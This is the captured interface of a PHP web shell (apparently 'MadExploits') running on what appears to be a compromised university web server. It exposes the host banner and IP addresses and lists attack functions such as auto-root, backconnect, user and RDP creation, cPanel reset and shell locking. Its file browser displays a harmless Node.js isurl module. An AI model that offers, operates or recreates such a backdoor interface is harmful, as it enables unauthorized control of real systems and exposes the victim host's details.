Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.144.117.164
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
isurl /
lib-es5 /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.27
KB
-rw-r--r--
index.js.map
2.6
KB
-rw-r--r--
props.js
391
B
-rw-r--r--
props.js.map
877
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict"; var hasToStringTag = require("has-to-string-tag-x"); var isObject = require("is-object"); var isURLSearchParams = require("is-urlsearchparams"); var _require = require("./props"), lenientProperties = _require.lenientProperties, strictProperties = _require.strictProperties; var searchParams = "searchParams"; var toStringTag = Object.prototype.toString; var urlClass = "[object URL]"; var isURL = function isURL(url) { var supportIncomplete = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false; if (!isObject(url)) { return false; } else if (hasToStringTag && toStringTag.call(url) !== urlClass) { // Shimmed implementation with incorrect constructor name return false; } else if (!strictProperties.every(function (prop) { return prop in url; })) { return false; } else if (supportIncomplete && searchParams in url) { return isURLSearchParams.lenient(url.searchParams); } else if (supportIncomplete) { return true; } else if (lenientProperties.every(function (prop) { return prop in url; })) { return isURLSearchParams(url.searchParams); } else { return false; } }; isURL.lenient = function (url) { return isURL(url, true); }; module.exports = isURL; //# sourceMappingURL=index.js.map
Close